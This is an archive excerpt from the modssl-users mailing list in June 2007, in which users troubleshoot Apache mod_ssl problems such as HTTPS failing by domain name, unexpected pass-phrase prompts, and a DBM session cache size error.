In-Reply-To: <59D4AF29ACE8044BB4C34C36A08A03AC314723@clotho.retainagroup.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL by Domain Name Error
thread-index: AceulcJbx4PbZV+aRO2Y5sJv6wbWrAC73C1g
From: "Rob Archer" 
To: 
X-Scanned-By: MailControl A-07-07-10 (www.mailcontrol.com) on 10.69.0.147
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rob Archer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C7B185.50C49872
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Anybody have any suggestions ?

	-----Original Message-----
	From: Rob Archer=20
	Sent: 14 June 2007 16:08
	To: 'modssl-users@modssl.org'
	Subject: SSL by Domain Name Error
=09
=09
=09
	Apache 2.2.4 Windows 2000 Server=20
=09=20
	Have created the key through open ssl and configured apache
(using http://raibledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL
instructions) and
	can access https via the IP address of the web server but not
the domain name. When trying to get the to the webserver via the domain
name through https it says internet explorer cannot display this web
page. Using the normal http protocol I can get the "It Works" page
through both IP address and domain name.
=09=20
	Have tried to get around this by fiddling about with the virtual
hosts settings but haven't found any solution. Can anyone help !!!



Any opinions expressed in this email are those of the individual and not ne=
cessarily the Company. This email and any files transmitted with it are con=
fidential and solely for use by the intended recipient(s). It may contain m=
aterial protected by Statutory or Regulatory Law. If you are not the intend=
ed recipient or the person responsible for delivering to the intended recip=
ient, you have received this email in error and its use is strictly prohibi=
ted. If you have received it in error please notify our Network Administrat=
or.

Although this email and any attachments are believed to be free of any viru=
s, or any other defect which might affect any computer or IT system into wh=
ich they are received and opened, it is the responsibility of the recipient=
 to ensure that they are virus free and no responsibility is accepted by Re=
tainagroup Ltd for any loss or damage arising in any way from receipt or us=
e thereof.

Company Registered in England No. 3164074.  Registered Address: Unit 5, St.=
 John's Court, Foster Road, Ashford Business Park, Ashford, Kent. TN24 0SJ.

(Tech Email: exadmin@retainagroup.co.uk,  Tech No.01233 333104,   Main No. =
01233 333000)=20

This message has been scanned for viruses by BlackSpider MailControl

------_=_NextPart_001_01C7B185.50C49872
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Message




Anybody have any suggestions ?


  

  
-----Original Message-----
From: Rob Arc=
her=20
  
Sent: 14 June 2007 16:08
To:=20
  'modssl-users@modssl.org'
Subject: SSL by Domain Name=20
  Error


  

  
Apache =
2.2.4=20
  Windows 2000 Server 

  
 

  
Have cr=
eated the=20
  key through open ssl and configured apache (using http://r=
aibledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL instructions)=20
  and

  
can acc=
ess https=20
  via the IP address of the web server but not the domain name. When trying=
 to=20
  get the to the webserver via the domain name through https it says intern=
et=20
  explorer cannot display this web page. Using the normal http protocol I c=
an=20
  get the "It Works" page through both IP address and domain=20
  name.

  
 

  
Have tr=
ied to get=20
  around this by fiddling about with the virtual hosts settings but haven't=
=20
  found any solution. Can anyone help=20
!!!





Any opinions expressed in this email are those of the ind=
ividual and not necessarily the Company. This email and any files transmitt=
ed with it are confidential and solely for use by the intended recipient(s)=
. It may contain material protected by Statutory or Regulatory Law. If you =
are not the intended recipient or the person responsible for delivering to =
the intended recipient, you have received this email in error and its use i=
s strictly prohibited. If you have received it in error please notify our N=
etwork Administrator.


Altho=
ugh this email and any attachments are believed to be free of any virus, or=
 any other defect which might affect any computer or IT system into which t=
hey are received and opened, it is the responsibility of the recipient to e=
nsure that they are virus free and no responsibility is accepted by Retaina=
group Ltd for any loss or damage arising in any way from receipt or use the=
reof.


Compa=
ny Registered in England No. 3164074.  Registered Address: Unit 5, St.=
 John's Court, Foster Road, Ashford Business Park, Ashford, Kent. TN24 0SJ.=



(Tech Email: exadmin@retainagroup.co.uk,  Tech No.01233 333104,  &n=
bsp;Main No. 01233 333000) 


This message has been scanned for viruses by BlackSpider MailControl



------_=_NextPart_001_01C7B185.50C49872--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 18 17:13:51 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id ECA7314D9E0; Mon, 18 Jun 2007 17:13:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (mower.iserver.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id 3E93414D841
	for ; Mon, 18 Jun 2007 17:13:49 +0200 (CEST)
Received: from gromit.corp.verio.net (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6.20060614/8.13.6) with ESMTP id l5IFCrID086719
	for ; Mon, 18 Jun 2007 09:12:54 -0600 (MDT)
Message-ID: <4676A0F0.20107@allez-oop.net>
Date: Mon, 18 Jun 2007 09:12:48 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 2.0.0.4 (X11/20070615)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error
References: <59D4AF29ACE8044BB4C34C36A08A03AC314726@clotho.retainagroup.com>
In-Reply-To: <59D4AF29ACE8044BB4C34C36A08A03AC314726@clotho.retainagroup.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Rob Archer wrote:
> Anybody have any suggestions ?

>     Have created the key through open ssl and configured apache (using
>     http://raibledesigns.com/wiki/Wiki.jsp?page=ApacheSSL instructions) and
>     can access https via the IP address of the web server but not the
>     domain name. When trying to get the to the webserver via the domain
>     name through https it says internet explorer cannot display this web
>     page. Using the normal http protocol I can get the "It Works" page
>     through both IP address and domain name.
>      
>     Have tried to get around this by fiddling about with the virtual
>     hosts settings but haven't found any solution. Can anyone help !!!

You might try adding a NameVirtualHost directive:

NameVirtualHost 1.2.3.4:443

(Your own IP address in place of '1.2.3.4'.)

If that doesn't help, please show us the  block for
this domain in your current Apache configuration.

-- 
Omar W. Hannet
http://www.allez-oop.net/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 18 17:34:42 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 210DD14D9DE; Mon, 18 Jun 2007 17:34:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (mower.iserver.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id 6DD0614D841
	for ; Mon, 18 Jun 2007 17:34:41 +0200 (CEST)
Received: from gromit.corp.verio.net (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6.20060614/8.13.6) with ESMTP id l5IFXj3Y097987
	for ; Mon, 18 Jun 2007 09:33:46 -0600 (MDT)
Message-ID: <4676A5D4.6050505@allez-oop.net>
Date: Mon, 18 Jun 2007 09:33:40 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 2.0.0.4 (X11/20070615)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache with mod_ssl
References: <3901F85E21D7EE44AC427250A221A53B065B1344@vegas.vormetric.com>
In-Reply-To: <3901F85E21D7EE44AC427250A221A53B065B1344@vegas.vormetric.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Do you have  tags surrounding all
SSL directives in your configuration file?  For example:


SSLPassPhraseDialog  builtin
# etc.


Saikat Saha wrote:_module>
> Apache was compiled as below
> 
> ./configure --with-ldap --enable-mods-shared="all ssl ldap cache proxy
> authn_alias mem_cache file_cache authnz_ldap charset_lite dav_lock
> disk_cache" --prefix=/opt/apache-2.2.4
> 
> Httpd -l gives below
> [root@rh4_109 bin]# httpd -l
> Compiled in modules:
>   core.c
>   prefork.c
>   http_core.c
>   mod_so.c
> 
> How do I compile so that it does not load mod_ssl automatically and
> loads only if httpd.conf is configured.
> 
> Surprisingly there are no error logs even at debug level.
> 
> Thank you so very much for the kind help.
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: Friday, June 15, 2007 4:13 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache with mod_ssl
> 
> Saikat Saha wrote:
>> We have apache 2.2.4 compiled with all modules but commented out all 
>> load modules. Do not have anything in httpd.conf file to state that
> this 
>> is https. But when I start apache, it tries to goto https and prompts 
>> for pass phrase. How does apache determine that this is https whereas 
>> this is actually a http server.
> 
> Perhaps mod_ssl is a compiled-in module.  Run 'httpd -l' to check this.
> 
>> After I enter a passphrase, it shows 
>> successful but the server never starts up. Can someone please help?
> 
> The reason probably can be found in Apache's error_log file.
> 
>> Also can apache support both http and https at different ports at the 
>> same time?
> 
> Yes.  The defaults are port 80 for http and port 443 for https.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 18 17:48:03 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D565D14D9DE; Mon, 18 Jun 2007 17:48:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cluster-e.mailcontrol.com (cluster-e.mailcontrol.com [217.79.216.190])
	by master.modssl.org (Postfix) with ESMTP id 897AA14D841
	for ; Mon, 18 Jun 2007 17:48:03 +0200 (CEST)
Received: from clotho.retainagroup.com (no-dns-yet-assigned.orbital.net [80.88.213.165] (may be forged))
	by rly50e.srv.mailcontrol.com (MailControl) with ESMTP id l5IFknbp003735
	for ; Mon, 18 Jun 2007 16:46:59 +0100
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: SSL by Domain Name Error
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Mon, 18 Jun 2007 16:47:52 +0100
Message-ID: <59D4AF29ACE8044BB4C34C36A08A03AC31472D@clotho.retainagroup.com>
In-Reply-To: <4676A0F0.20107@allez-oop.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL by Domain Name Error
thread-index: Acexu3a6syAPT4buRiukNQyvcon4MgABGINg
From: "Rob Archer" 
To: 
X-Scanned-By: MailControl A-07-07-10 (www.mailcontrol.com) on 10.69.0.160
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rob Archer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks for the response, I'm using the following in the httpd.conf
file:-


SSLMutex default
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLSessionCache none
ErrorLog logs/ssl.log
LogLevel info



SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
Sent: 18 June 2007 16:13
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error


Rob Archer wrote:
> Anybody have any suggestions ?

>     Have created the key through open ssl and configured apache (using
>     http://raibledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL
instructions) and
>     can access https via the IP address of the web server but not the
>     domain name. When trying to get the to the webserver via the
domain
>     name through https it says internet explorer cannot display this
web
>     page. Using the normal http protocol I can get the "It Works" page
>     through both IP address and domain name.
>=20=20=20=20=20=20
>     Have tried to get around this by fiddling about with the virtual
>     hosts settings but haven't found any solution. Can anyone help !!!

You might try adding a NameVirtualHost directive:

NameVirtualHost 1.2.3.4:443

(Your own IP address in place of '1.2.3.4'.)

If that doesn't help, please show us the  block for this
domain in your current Apache configuration.

--=20
Omar W. Hannet
http://www.allez-oop.net/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 Click
https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D
fMgBK8DIcc6MewdBLPY6HM3uCsIoIfWJQ!0Y2VdZHSsmugCwvzzwfe946vzFomHzKSVMo!xh
LH2GhBuaixmbErtfYMN4HkbPTCJC6Pv3JUYJ7cQJe9p9qcDVg+Z43dzgaPp!JI8EBMOY08Pc
LiPsL1wg48Tzt71za7Vke8vo28dsU9mY8+kaYom  to report this email as spam.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 18 18:06:51 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 187D514D9DE; Mon, 18 Jun 2007 18:06:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (mower.iserver.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id 14FCE14D841
	for ; Mon, 18 Jun 2007 18:06:49 +0200 (CEST)
Received: from gromit.corp.verio.net (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6.20060614/8.13.6) with ESMTP id l5IG5svl016425
	for ; Mon, 18 Jun 2007 10:05:55 -0600 (MDT)
Message-ID: <4676AD5D.8020207@allez-oop.net>
Date: Mon, 18 Jun 2007 10:05:49 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 2.0.0.4 (X11/20070615)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error
References: <59D4AF29ACE8044BB4C34C36A08A03AC31472D@clotho.retainagroup.com>
In-Reply-To: <59D4AF29ACE8044BB4C34C36A08A03AC31472D@clotho.retainagroup.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

What's the result when you set ServerName to your domain
name within the virtual host?:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


Rob Archer wrote:
> Thanks for the response, I'm using the following in the httpd.conf
> file:-
> 
> 
> SSLMutex default
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLSessionCache none
> ErrorLog logs/ssl.log
> LogLevel info
> 
> 
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/server.crt
> SSLCertificateKeyFile conf/ssl/server.key
> 
> 
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: 18 June 2007 16:13
> To: modssl-users@modssl.org
> Subject: Re: SSL by Domain Name Error
> 
> 
> Rob Archer wrote:
>> Anybody have any suggestions ?
> 
>>     Have created the key through open ssl and configured apache (using
>>     http://raibledesigns.com/wiki/Wiki.jsp?page=ApacheSSL
> instructions) and
>>     can access https via the IP address of the web server but not the
>>     domain name. When trying to get the to the webserver via the
> domain
>>     name through https it says internet explorer cannot display this
> web
>>     page. Using the normal http protocol I can get the "It Works" page
>>     through both IP address and domain name.
>>      
>>     Have tried to get around this by fiddling about with the virtual
>>     hosts settings but haven't found any solution. Can anyone help !!!
> 
> You might try adding a NameVirtualHost directive:
> 
> NameVirtualHost 1.2.3.4:443
> 
> (Your own IP address in place of '1.2.3.4'.)
> 
> If that doesn't help, please show us the  block for this
> domain in your current Apache configuration.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 18 18:29:43 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A55B914D9DC; Mon, 18 Jun 2007 18:29:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cluster-e.mailcontrol.com (cluster-e.mailcontrol.com [217.79.216.190])
	by master.modssl.org (Postfix) with ESMTP id 62B8F14D841
	for ; Mon, 18 Jun 2007 18:29:43 +0200 (CEST)
Received: from clotho.retainagroup.com (no-dns-yet-assigned.orbital.net [80.88.213.165] (may be forged))
	by rly52e.srv.mailcontrol.com (MailControl) with ESMTP id l5IGSfoT015429
	for ; Mon, 18 Jun 2007 17:28:42 +0100
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: SSL by Domain Name Error
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Mon, 18 Jun 2007 17:30:03 +0100
Message-ID: <59D4AF29ACE8044BB4C34C36A08A03AC31472E@clotho.retainagroup.com>
In-Reply-To: <4676AD5D.8020207@allez-oop.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL by Domain Name Error
thread-index: AcexwuAPKFDRPsxvTSmdsNINrilsNQAAberw
From: "Rob Archer" 
To: 
X-Scanned-By: MailControl A-07-07-10 (www.mailcontrol.com) on 10.69.0.162
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rob Archer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Unfortunately exactly the same, I've even put the domain name as the
virtual host and it behaves the same !!!

(i.e )

I was thinking that the way the web server is set up is by "web
forwarding", where the holders of our domain name forward requests onto
the ip address of our web server. This works for http, could it be
possible that something needs configuring at the company that holds our
domain name (easily.co.uk) to forward on https requests, or is that a
real long shot ?



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
Sent: 18 June 2007 17:06
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error


What's the result when you set ServerName to your domain
name within the virtual host?:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


Rob Archer wrote:
> Thanks for the response, I'm using the following in the httpd.conf
> file:-
>=20
> 
> SSLMutex default
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLSessionCache none
> ErrorLog logs/ssl.log
> LogLevel info
> 
>=20
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/server.crt
> SSLCertificateKeyFile conf/ssl/server.key
> 
>=20
>=20
> -----Original Message-----
> From: owner-modssl-users@modssl.org=20
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: 18 June 2007 16:13
> To: modssl-users@modssl.org
> Subject: Re: SSL by Domain Name Error
>=20
>=20
> Rob Archer wrote:
>> Anybody have any suggestions ?
>=20
>>     Have created the key through open ssl and configured apache
(using
>>     http://raibledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL
> instructions) and
>>     can access https via the IP address of the web server but not the
>>     domain name. When trying to get the to the webserver via the
> domain
>>     name through https it says internet explorer cannot display this
> web
>>     page. Using the normal http protocol I can get the "It Works"
page
>>     through both IP address and domain name.
>>=20=20=20=20=20=20
>>     Have tried to get around this by fiddling about with the virtual
>>     hosts settings but haven't found any solution. Can anyone help=20
>> !!!
>=20
> You might try adding a NameVirtualHost directive:
>=20
> NameVirtualHost 1.2.3.4:443
>=20
> (Your own IP address in place of '1.2.3.4'.)
>=20
> If that doesn't help, please show us the  block for this=20
> domain in your current Apache configuration.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 Click
https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D
1zjrSD8hWEe96repmpaOSdLMvmLORniQDfYJTSjBfD!nkU9R0u8dlLFoNT85Zo6jf9yegQzk
pg9iGvxGJKsNeMk8vpdiUWF8qBDGGfaGgdaAcnXV!xUKnI0XzkSD3mUR0s5mD0+fIpcaD4yO
5vBMHXJE1FQ0bouh7TVke8vo28dsfWWo4QK!9LC  to report this email as spam.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 18 23:23:39 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4934514D84F; Mon, 18 Jun 2007 23:23:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hq-ipt01.anteon.com (hq-ipt01.anteon.com [198.185.182.20])
	by master.modssl.org (Postfix) with ESMTP id 7E71B14D841
	for ; Mon, 18 Jun 2007 23:23:37 +0200 (CEST)
Received: from hq-exout01.anteon.com ([10.170.1.216])
  by hq-ipt01.anteon.com with ESMTP; 18 Jun 2007 17:22:43 -0400
X-SENDER-IP: 10.170.1.216
X-SENDER-REPUTATION: None
X-IronPort-AV: i="4.16,436,1175486400"; 
   d="scan'208"; a="34097558:sNHT18857405"
Received: from HQ-EXVS02.anteon.com ([10.170.1.143]) by HQ-EXOUT01.anteon.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Mon, 18 Jun 2007 17:22:43 -0400
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: dbm Session Cache
Date: Mon, 18 Jun 2007 17:22:41 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: dbm Session Cache
Thread-Index: Acex7s31Kb7z93mkQ4SoPSbm/keVpg==
From: "Fought, Richard" 
To: 
X-OriginalArrivalTime: 18 Jun 2007 21:22:43.0271 (UTC) FILETIME=[CEC52D70:01C7B1EE]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Fought, Richard" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I am running Apache 2.0.59 with mod_ssl on Windows Server 2003 and am
noticing that dbm session caching is not working.

With the following configuration option:

SSLSessionCache dbm:logs/ssl-scache.log

The DIR/PAG files are created, but they are always size zero, and the
server never reuses sessions when requested by the client.

I'm seeing this error message in the logs - any suggestions?

[Mon Jun 18 13:55:49 2007] [debug] ssl_scache_dbm.c(134): data size too
large for DBM session cache: 957 >=3D 950

Are other cache storage types preferable to dbm?  I tried shmcb and it
works fine - perhaps I should just stick with shm?

Thanks,
Rich
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 02:16:35 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2D9E814D850; Tue, 19 Jun 2007 02:16:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from v200.vormetric.com (adsl-68-121-169-125.dsl.pltn13.pacbell.net [68.121.169.125])
	by master.modssl.org (Postfix) with ESMTP id CFFD814D82E
	for ; Tue, 19 Jun 2007 02:16:31 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Apache with mod_ssl
Date: Mon, 18 Jun 2007 17:15:34 -0700
Message-ID: <3901F85E21D7EE44AC427250A221A53B065B166B@vegas.vormetric.com>
In-Reply-To: <4676A5D4.6050505@allez-oop.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache with mod_ssl
Thread-Index: Acexvijc6l1mgd5MSemC1fZCG2sCZQASEeiQ
From: "Saikat Saha" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Saikat Saha" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry for late response on this one. This is what we have in httpd.conf
which is generated at compile time. This problem does not go away even
if I comment out last four lines and restart apache. Could you please
advise what else could be leading apache to think it is https rather
than http?



# Secure (SSL/TLS) connections
#Include conf/extra/httpd-ssl.conf
#
# Note: The following must must be present to support
#       starting without SSL on platforms with no /dev/random equivalent
#       but a statically compiled-in mod_ssl.
#

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin



With above commented out, when I try to start apache, I get following
passphrase prompt and apache does not start even after saying passphrase
successful, no logs in logs directory although log level is "debug"

]# ./apachectl start
httpd: Could not reliably determine the server's fully qualified domain
name, using 10.3.110.109 for ServerName
Apache/2.2.4 mod_ssl/2.2.4 (Pass Phrase Dialog)
Some of your private key files are encrypted for security reasons.
In order to read them you have to provide the pass phrases.

Server 10.3.110.109:443 (RSA)
Enter pass phrase:

OK: Pass Phrase Dialog successful.
[root@rh4_109 bin]#

Thanks you very much for your help.


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
Sent: Monday, June 18, 2007 8:34 AM
To: modssl-users@modssl.org
Subject: Re: Apache with mod_ssl

Do you have  tags surrounding all
SSL directives in your configuration file?  For example:


SSLPassPhraseDialog  builtin
# etc.


Saikat Saha wrote:_module>
> Apache was compiled as below
>=20
> ./configure --with-ldap --enable-mods-shared=3D"all ssl ldap cache =
proxy
> authn_alias mem_cache file_cache authnz_ldap charset_lite dav_lock
> disk_cache" --prefix=3D/opt/apache-2.2.4
>=20
> Httpd -l gives below
> [root@rh4_109 bin]# httpd -l
> Compiled in modules:
>   core.c
>   prefork.c
>   http_core.c
>   mod_so.c
>=20
> How do I compile so that it does not load mod_ssl automatically and
> loads only if httpd.conf is configured.
>=20
> Surprisingly there are no error logs even at debug level.
>=20
> Thank you so very much for the kind help.
>=20
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: Friday, June 15, 2007 4:13 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache with mod_ssl
>=20
> Saikat Saha wrote:
>> We have apache 2.2.4 compiled with all modules but commented out all=20
>> load modules. Do not have anything in httpd.conf file to state that
> this=20
>> is https. But when I start apache, it tries to goto https and prompts

>> for pass phrase. How does apache determine that this is https whereas

>> this is actually a http server.
>=20
> Perhaps mod_ssl is a compiled-in module.  Run 'httpd -l' to check
this.
>=20
>> After I enter a passphrase, it shows=20
>> successful but the server never starts up. Can someone please help?
>=20
> The reason probably can be found in Apache's error_log file.
>=20
>> Also can apache support both http and https at different ports at the

>> same time?
>=20
> Yes.  The defaults are port 80 for http and port 443 for https.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 09:48:29 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4C83D14D870; Tue, 19 Jun 2007 09:48:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.dgi.minefi.gouv.fr (mta4-milter-pas2.dgi.minefi.gouv.fr [145.242.2.165])
	by master.modssl.org (Postfix) with ESMTP id 4CDD914D82E;
	Tue, 19 Jun 2007 09:48:28 +0200 (CEST)
Received: from mail.dgi.minefi.gouv.fr (localhost.localdomain [127.0.0.1])
	by localhost (Postfix) with SMTP id 201CDC900AF;
	Tue, 19 Jun 2007 09:47:30 +0200 (CEST)
Received: from E59A-60.eole.dgi (e59a-60.eole.dgi [10.153.67.60])
	by mail.dgi.minefi.gouv.fr (Postfix) with ESMTP id D572CC9009B;
	Tue, 19 Jun 2007 09:47:29 +0200 (CEST)
Received: from e59a-50.eole.dgi (unknown [10.153.67.50])
